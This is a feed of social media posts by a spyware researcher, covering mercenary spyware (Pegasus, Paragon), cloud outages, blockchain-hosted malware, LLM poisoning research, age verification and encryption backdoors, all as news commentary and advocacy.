Hotel toilet privacy is disappearing.
Glass doors.
Or no door.
Or a big window into the room.
Who is asking for this?
Suddenly hearing about zcash everywhere.
Feels inorganic.
What's up?
YIKES: NSO floats Pegasus spyware use in a "time of domestic crisis" in 🇺🇸America.
I believe they won't stop lobbying until they get Pegasus into USA.
To hack Americans. 
POV: you can't sleep because your bed can't talk to AWS.
Design thinking that inserts brittle dependence into our lives while extracting fees for life.
Don't be these guys.
GOOD MORNING.
Today's massive outages nicely illustrate which of your favorite internet things are secretly Amazon-dependent.
Specifically on US-EAST-1 Region, which woke up with Main Character Syndrome.
Result? Massive outages.
Sure, Amazon has regions.
But US-EAST-1 is the legacy/default for a pile of services...and other Global Amazon services also depended on it.
So when there was trouble...it was quickly everywhere.
Hyperscalers rule *almost* everything around us. And this is absolutely bad news for all sorts of resiliency.
Amazon sez: root cause = DNS resolution with DynamoDB... which a ton depends on.
They say they are mostly mitigated & have a pile of backlog to clear.
But this is a great moment to think about just how many eggs that matter are in one basket...
NEW: 🇰🇵DPRK hackers have begun hiding malware on blockchain.
Result, decentralized, immutable malware from a government crypto theft operation.
It only cost $1.37 USD in gas fees per malware change (e.g. to update the command & control server)
Blockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers.
And Blockchain explorers are a natural target.
Nearly impossible to remove.
Experimentation with putting malware on blockchains is in infancy.
Ultimately there will be some efforts to try and implement social engineering protection around this, but combined with things like agentic AI & vibe coding by low-information people...whew boy this gold seam is going to be productive for a long time.
Still, where here they used social engineering, I expect attackers to also experiment with directly loading zero click exploits onto blockchains targeting things like blockchain explorers & other systems that process blockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets.
REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding
NEW: Cost to 'poison' an LLM and insert backdoors is relatively constant. Even as models grow.
Implication: scaling security is orders-of-magnitude harder than scaling LLMs.
Prior work had suggested that as model sizes grew, it would make them cost-prohibitive to poison.
So, in LLM training-set-land, dilution isn't the solution to pollution.
Just about the same size of poisoned training data that works on a 1B model could also work on a 1T model.
I feel like this is something that cybersecurity folks will find intuitive: lots of attacks scale. Most defenses don't
PAPER: POISONING ATTACKS ON LLMS REQUIRE A NEAR-CONSTANT NUMBER OF POISON SAMPLES https://arxiv.org/pdf/2510.07192
Only four fire department callouts?
Clearly the Asian market isn't stocking enough durians.
Durian is one of the only fruits where your nose can tell you if it's in stock before you get near the section.
Also, I disagree that Durian smells of gas. It smells of sweet old wet socks and vanilla ice cream.
NEW: breach of Discord age verification data.
For some users this means their passports & drivers licenses.
Discord has only run age verification for 6 months.
Age verification is a badly implemented data grab wrapped in a moral panic.
Proponents say age verification = showing your ID at the door to a bar.
But the analogy is often wrong.
It's more like: bouncer photocopies some IDs, & keeps them in a shed around back.
There will be more breaches.
But it should bother you that the technology promised to make us all safer, is quickly making us less so.
STORIES:
https://www.theverge.com/news/792032/discord-customer-service-data-breach-hack
NEW: turns out the EU helped finance a bunch of spyware companies with..public money.
That's YOUR money if you live in Europe.
Eou deserve to know that your money is fueling spyware companies like Paragon.
And if you aren't in Europe? There's a good chance that the mercenary spyware crisis is still fueled by your pensions & tax dollars.
Whether it's Oregon public employees or Alaskans, Europeans or folks in South Yorkshire...
The Fund managers stewarding your cash bear a heavy ethical responsibility for the harms they turbocharged.
And they completely sidestep it.
Now a group of MEPs from 4 EU political groups is calling for action & transparency. Good to see them leaning in...
It's great to see a cross-cutting call for action...
Kudos to these MEPs for standing up. But honestly, there should be many, many more..
Here's the story: https://apache.be/2025/10/01/european-investment-fund-eif-financed-israeli-spyware-company-paragon
PAY ATTENTION: The UK again asked Apple to backdoor iCloud encryption.
Backdoors create a massive target for hackers & criminal groups.
Dictators will inevitably demand that Apple build the same access structure for them.
They insert vulnerable bad things right at the place where we need the strongest protections.
This latest attempt to demand access is *yet another* unreasonable, secret demand on Apple (a TCN) from the Home Office....
https://www.ft.com/content/d101fd62-14f9-4f51-beff-ea41e8794265
Friend,
If scrolling leaves you feeling hollowed...
If anger is frictionless and thinking feels like fighting the current,
You're not swimming, you're being swept in an algorithmic rip tide.
And your mental clarity is the target.
So, take a beat and step out
Put the thing down.
Connect with your own thoughts.
It's what the designers of these algorithms fear most.
New episode just dropped with nostr:nprofile1qydhwumn8ghj7mn0wd68yttsw43zuum9d45hxmmv9ejx2aspr4mhxue69uhkummnw3ez6ur4vgh8wetvd3hhyer9wghxuet5qqsxp8ccdjsz84jccrlqr9tsguh4j4ju30sac93mz4ql4jwep2jw3tc6ev6xs and it was a banger!
Exposing Pegasus: How the State Spies on You | John Scott-Railton
We discuss:
- Exposing Pegasus
- Governments spying on you
- The end of free speech
- AI changing surveillance
Watch it here: https://youtu.be/iz_8ELBJRF0
Honored to be invited to share my views on the podcast. You are a gentleman and a scholar.
Thank you for having me nostr:nprofile1qyxhwumn8ghj7cnjvghxjme0qyt8wumn8ghj7etyv4hzumn0wd68ytnvv9hxgtcqyrtl8gkckam5xwfxugu46v2e3yhgg70gwx5qpeqp7prlkz9dzlejkvg2vts
New episode just dropped with nostr:nprofile1qydhwumn8ghj7mn0wd68yttsw43zuum9d45hxmmv9ejx2aspr4mhxue69uhkummnw3ez6ur4vgh8wetvd3hhyer9wghxuet5qqsxp8ccdjsz84jccrlqr9tsguh4j4ju30sac93mz4ql4jwep2jw3tc6ev6xs and it was a banger!
Exposing Pegasus: How the State Spies on You | John Scott-Railton
We discuss:
- Exposing Pegasus
- Governments spying on you
- The end of free speech
- AI changing surveillance
Watch it here: https://youtu.be/iz_8ELBJRF0
The internet needs YOU to stand up against surveillance abuses & mercenary spyware.
Thank you for your attention to this matter.
NEW: foreign mercenary spyware is coming to the US.
ICE just quietly unsuspended contract with spyware maker #Paragon.
They got caught this year being used to hack journalists.
Friend, let me me bring you up to speed on why this is bad on multiple fronts.
YOUR BACKGROUND BRIEF:
#Paragon was co-founded in Israel in 2019 by ex head of Israel's NSA equivalent (Unit 8200) w/ major backing from former Israeli PM Ehud Barak.
Pitched themselves as stealthy & abuse-proof alternative to NSO Group's Pegasus.
The company has been trying to get into the US market for years.
For a long time all we knew about Paragon was their performance as a 'virtuous' spyware company with values.
All that came to a crashing halt in 2025 when they got very caught, helping customers hack targets across #WhatsApp.
WhatsApp did the right thing & notified users.
Almost immediately after the WhatsApp notifications, we started learning about the targets.
They weren't the supposed serious criminals... They were Journalists... human rights defenders...groups working on sea rescues.. etc
In other words, a very NSO-like scandal.
Ultimately Paragon & its Italian customer had a massive spyware scandal on their hands.
WhatsApp wasn't the only player tracking paragon & doing user notifications. Apple got in on the game.
Ultimately, we at the Citizen Lab had forensically analyzed cases from each notification round.
We testified to Italy's parliamentary intelligence oversight committee about our findings.
The conclusion? Deeply unsatisfactory.
Italy admitted hacking some targets, but denied hacking journalists.
Tons of loose ends with Paragon. And they haven't been honest about who used their tech to hack journalists in Europe.
BIG PICTURE:
After 14 years investigating countless spyware companies, I tell you with confidence:
Mercenary spyware is a power abuse machine incompatible with American constitutional rights and freedoms.
Our legal system isn't designed for it, oversight mechanisms are woefully inadequate to protect our rights...
Here's the thing. You probably know that mercenary spyware like #Pegasus gets sold to dictators.
Who, predictably, abuse it.
But We have a growing pile of cases where spyware is sold to democracies... and then gets abused.
HISTORY LESSONS
History shows: secret surveillance usually winds up abused.
The history of the US is littered with surveillance abuses.
Thing is, our phones offer an unprecedented window into our lives.
Making zero-click mercenary spyware an especially grave risk to all our freedoms.
If the government has wants access to your accounts for law enforcement...they have to prepare a judicially authorized request and send it to the company, which reviews it.
Mercenary spyware bypasses any external review.
And the whole industry behind it seeks maximum obscurity.
COUNTERINTELLIGENCE THREATS? YEAH THAT TOO
I'm concerned about the impact on our rights an dour privacy.
But there's something else that should worry everybody about the choice to work with the company: Paragon poses a potentially grave counterintelligence threat to the US. Let me explain.
When you use an integrated spyware package to conduct sensitive law enforcement / intelligence business, you have to place a lot of trust in them...
If the developers originate from a foreign intelligence service that aggressively collects against the US government, that should be a huge red flag.
America (or any country) should be maximally wary about using foreign-developed surveillance tech for the same reason that America shouldn't operate a Chinese-made stealth fighter.
So, have Paragon's spyware, people & ops been aggressively vetted for technical and human counterintelligence risks?
MERCENARY SPYWARE = FATE SHARING
Paragon's #Graphite mercenary spyware shares the same downsides as other products in their class:
❌They keep getting caught
We researchers aren't the only ones that have found techniques for tracking and identifying Paragon spyware... I'm sure hostile govs have too.
❌Customers fate share.
Since all customers roll the same tech, when one gets caught it impacts & potentially exposes everyones' activities.
Now, that fate sharing will include US law enforcement activity.
WHAT CAN YOU DO?
What can you do? Take 5 minutes and call your member of Congress.
Ask them to request a briefing on Paragon.
They should ask whether the company was properly vetted & reviewed.
What is the oversight mechanism for this maximally invasive technology?
What are the guardrails? How would abuses be handled? Etc.
PERSONAL SECURITY?
Paragon & this category of spyware is fiendishly hard to track & defend against.
And on a personal level? Apple's Lockdown Mode & Android Advanced Protection both offer some serious security benefits but neither is a silver bullet..
Unfortunately, as of right now I am pretty confident that no publicly available / commercially developed third party tool can reliably detect Paragon spyware either in realtime. Or retrospectively.
Beware a false sense of security.
If you got this far & found this post useful, let me know! Drop a comment.
SELECTED READING LIST
Exclusive: ICE reactivated its $2 million contract with Israeli spyware firm Paragon, following its acquisition by U.S. capital
https://jackpoulson.substack.com/p/exclusive-ice-has-reactivated-its
Virtue or Vice? A First Look at Paragon’s Proliferating Spyware Operations
https://citizenlab.ca/2025/03/a-first-look-at-paragons-proliferating-spyware-operations/
Graphite Caught
First Forensic Confirmation of Paragon’s iOS Mercenary Spyware Finds Journalists Targeted
GOOD MORNING: WhatsApp caught & fixed a sophisticated zero click attack...
They just published an advisory about it.
Say attackers combined the exploit with an Apple vulnerability to hack a specific group of targets (i.e. this wasn't pointed at everybody)
That's a CROSS-APP exploit chain. Which is fancy. We'll discuss in a second.
But wait, you say, haven't I heard of WhatsApp zero-click exploits not so long ago?
You have.
A big user base makes a platform big target for exploit development.
Attacker's perspective = an exploit against a popular messenger gives you potential access to a lot of devices.
The regular tempo of large platforms catching sophisticated exploits is a good sign.
They're paying attention & devoting resources to a growing category: highly targeted, sophisticated attacks.
But it's also a reminder of the magnitude of the threat.
Here's the Apple CVE.
Somewhere, earlier this summer, some people in a room probably had a bad day when this clever cross-app chain stopped working.
The cross- app chain = probably also a sign of the increasing tech lift required to get to device compromise. Consequence of various mitigations.
The cost-to-compromise is only going up. Which is arguably a sign that the increasing scrutiny + efforts by platforms & OS developers is having an impact.
That said, the threat of this stuff is going nowhere because there's an infinite governmental appetite for compromise.
Still, I'd argue that increasing costs of zero-clicks has the effect of pricing out a bunch of potential actors which slows the proliferation of this tech to *some* bad actors.
WhatsApp Advisory: https://www.whatsapp.com/security/advisories/2025/
Apple Advisory: https://support.apple.com/en-us/124925
The water is boiling.
Frog, it's time to get out of the pot.
Did the University of Chicago blow their endowment on shitcoins?
Nobody is exactly sure how much they gambled and lost on 'crypto.'
But they are now freezing research amidst federal funding cuts.
If only they'd put that money into BTC those labs where I slaved away as an undergrad would be humming.
Age-verification laws are a universal mute button for free speech.
Government‑mandated KYC to read is coming fast.
And the walls of castle freedom are cracking.
Why haven't mosquitoes evolved silent flight?
"everybody who's out there thinking of using VPNs, let me just say to you directly, verifying your age keeps a child safe...So let's just not try and find a way around. Just prove your age."
- UK government.
https://blossom.primal.net/603be98e6ef0e56611d5583c63c9ec0b2461541b81785456cd0441048b2db5d3.mp4
WHOA: Could Germany Ban Ad Blockers?
German megapublisher Axel Springer is asking a German court to ban an ad-blocker.
They claim HTML/ CSS of their sites are protected computer programs.
And influencing they are displayed (e.g by removing ads) violates copyright.
I'm in puzzled wonderment at this claim.
Preventing ad-blocking would be a huge blow to German cybersecurity and privacy.
There are critical security & privacy reasons to influence how a websites code gets displayed.
Like stripping out dangerous code & malvertising.
Hacking risks from the online advertising are documented.
Any attempt to force Germans to run all of the code on a website without consideration for their privacy and security rights and needs will end very, very poorly.
Defining HTML/CSS as a protected computer program will quickly lead to absurdities touching every corner of the internet.
Just think of the potential infringements:
-Screen readers for the blind
-'Dark mode' bowser extensions
-Displaying snippets of code in a university class
-Inspecting & modifying code in your own browser
-Website translators
Or blocking unwanted trackers.
This is why most governments do it on their systems.
I'm not a lawyer, but if Axel Springer wins the consequences are just nuts:
Basic stuff like bookmarking & saving a local copy of a website might be legally risky.
The Wayback Machine & internet archives and libraries might be violators.
This might even extend to search engines displaying excerpts of sites.
Code sharing sites like GitHub could become a liability minefield...
The list goes on and on.
Finally, only one country has banned ad-blockers. China.
This is not good company for Germany.
READ MORE: From Mozilla https://blog.mozilla.org/netpolicy/2025/08/14/is-germany-on-the-brink-of-banning-ad-blockers-user-freedom-privacy-and-security-is-at-risk/
Bleeping Computer: https://www.bleepingcomputer.com/news/legal/mozilla-warns-germany-could-soon-declare-ad-blockers-illegal/
NEW: UK reportedly drops secret demand for Apple encryption backdoor.
Good.
While there was strong activist pressure here the key push came from the US government.
But there is zero rest for the weary as the UK has been leaning much harder into Age Verification.
Which is another mechanism for gaining deep visibility into peoples online activity.
Story: https://www.theverge.com/news/761240/uk-apple-us-encryption-back-door-demands-dropped
Yeah! Humans do OSINT. Some do it super well.
So what is different about an automated house locator as a service that uses dwelling interior pics?
Turns out we counted on friction to protect us.
Not rules. Not norms.
There just weren't millions of Trevor Rainbolts that could act instantly OSINT anything that invasive.
It was a cost thing.
Meanwhile the datasets were getting collected. Zillow. AirBnB.. etc etc.
When the right invasive automation came along... the privacy / rights intrusion became automated & scaled. Unstoppable.
And we were left unprotected.
Like with so many privacy & power things.
I have, it's a clever vector.
But what I find especially interesting is how all of the old categories of attack are sort of getting...rediscovered for the vibecoding era.
This is like the reboot of typosquatting.
Neuroticism? Ripping.
Conscientiousness & agreeableness? Dipping.
Via FT: https://www.ft.com/content/5cd77ef0-b546-4105-8946-36db3f84dc43
If you want to browse the data yourself you can get it here: https://uasvis.usc.edu/corevisualization.php 
Internet-connected microphones in school bathrooms.
What could go wrong?
Mandated microphones in private spaces are a bad idea.
Throwing invasive sensors into private spaces rarely fixes socially scary problems.
But is almost guaranteed to have risky downsides. 
Story: https://www.wired.com/story/school-bathroom-vape-detector-audio-bug/
Age verification laws are coming fast.
And, from my perspective, opponents are struggling to find impactful messaging to explain to the general public the damage they are about to do to freedom.
Or to propose alternate futures that address the underlying anxieties.
Sure, most folks that are here on #Nostr intuitively understand the dangers... And nod along when we gesture at the dangers of surveillance overreach.
But I worry that the common language for talking about these initiatives typically relies on some priors that are not universally shared outside people that live and breathe concerns about tech.
Saying that something is a surveillance dystopia works on me. But not the neighbors.
I'm guilty of being inside this language bubble too, and it's hard to escape.
Yet, when faced with politicians talking about protecting kids from bad things that parents feel they see right now... I worry that the communities doing pushback are struggling to:
1 -find framing that makes *enough sense* to the vast majority of people that they say 'ok this is net bad' and push back
2- find their own ways to productively connect with the anxieties that politicians are drawing on. E.g. worried parents.
3- offer things that are honest, well meaning alternative paths for the underlying problems
Anyone have thoughts on this? #AskNostr
BREAKING: jury awards massive $167 million in punitive damages against spyware company NSO Group.
It turns out that the regular people on a jury think it is evil when you help dictators hack dissidents.
After years of every trick & delay tactic it only took a California jury ONE DAY of deliberation to get this Monsanto-scale verdict. Precedent-setting win against notorious #Pegasus spyware maker.
BACKSTORY:
Rewind to 2019. About this time (April-May) #WhatsApp catches NSO Group hacking its users with #Pegasus.
They investigated.
We at Citizen Lab helped to investigate the targets & get in touch with the activists journalists & civil society members that were targeted
We identified at least 100. And got in touch. It was a tremendous push of sleepless days. But it made it so clear just how much harm was being done.
Then, In October 2019 WhatsApp sued.
Prior to the lawsuit, NSO had acted the playground bully.
Targeting victims that dared speak up & researchers like us.
Suddenly, the bully wasn't so surefooted. Like the scene in a high school movie where the cousin shows up in the beat up car & collars the bully.
You might not remember, but in 2019 no country had sanctioned NSO Group... No parliamentary hearings, no hearings in congress, no serious investigations.
For years, WhatsApp's lawsuit helped carry momentum & showed governments that their tech sectors were in the crosshairs from mercenary spyware too...
Credit due to Meta & WhatsApp leadership on this one, they stuck the fight out & carried it across the finish line.
NOTIFICATIONS MATTER
WhatsApp's choice to notify targets was also hugely consequential.
A lot of cases were first surfaced from these notifications.
With dissidents around the world suddenly learning that dictators were snooping in their phones...with NSO Group's help.
A SIDEBAR: HARASSING RESEARCHERS
One of NSO's many tactics was to leverage the case to badger me & us Citizen Lab researchers to try and extract information.
It never worked, but it laid bare the tactics that these firms prefer...instead of coming clean.
ROLE OF CIVIL SOCIETY
Ultimately, we wouldn't be here without civil society investigations of mercenary spyware... and alarm raising.
And victims choosing to come forwads.
Thankfully today there's a whole accountability ecosystem growing around this work.
Dozens of orgs engaging.
Numbers are growing.
IS THERE GONNA BE IMPACT? YES
NSO Group emerges from the trial severely damaged.
The damages ($167,254,000 punitive, $440K+ compensatory) is big enough to make your eyes water.
NSO'S BUSINESS IS NOW ALL OVER THE NET
The case is also a blow to NSO's secrecy, with their business splashed all over a courtroom.
WhatsApp just published NSO's depositions, exposing an unprecedented amount of info on a spyware company's operations:
This will scare customers. And investors. And other companies that do the same thing. Good.
MY VIEW:
Watching a jury of regular citizens see right through NSO's mendacity & hypocrisy...and to the need to protect privacy is amazing.
Gives me hope.
Despite all the fancy lawyering & lobbying, people know that this kind of privacy invasion is wrong.
Read more:
They Exposed an Israeli Spyware Firm. Now the Company Is Badgering Them in Court. https://theintercept.com/2024/05/06/pegasus-nso-group-israeli-spyware-citizen-lab/
Spyware maker NSO ordered to pay $167 million for hacking WhatsApp
https://www.washingtonpost.com/technology/2025/05/06/nso-pegasus-whatsapp-damages/
NSO Group must pay more than $167 million in damages to WhatsApp for spyware campaign https://techcrunch.com/2025/05/06/nso-group-must-pay-more-than-167-million-in-damages-to-whatsapp-for-spyware-campaign/
Coda: WhatsApp acknowledges long road to collecting damages, but are stating their intention to donate to help orgs that assist spyware victims.
Source: https://about.fb.com/news/2025/05/winning-the-fight-against-spyware-merchant-nso/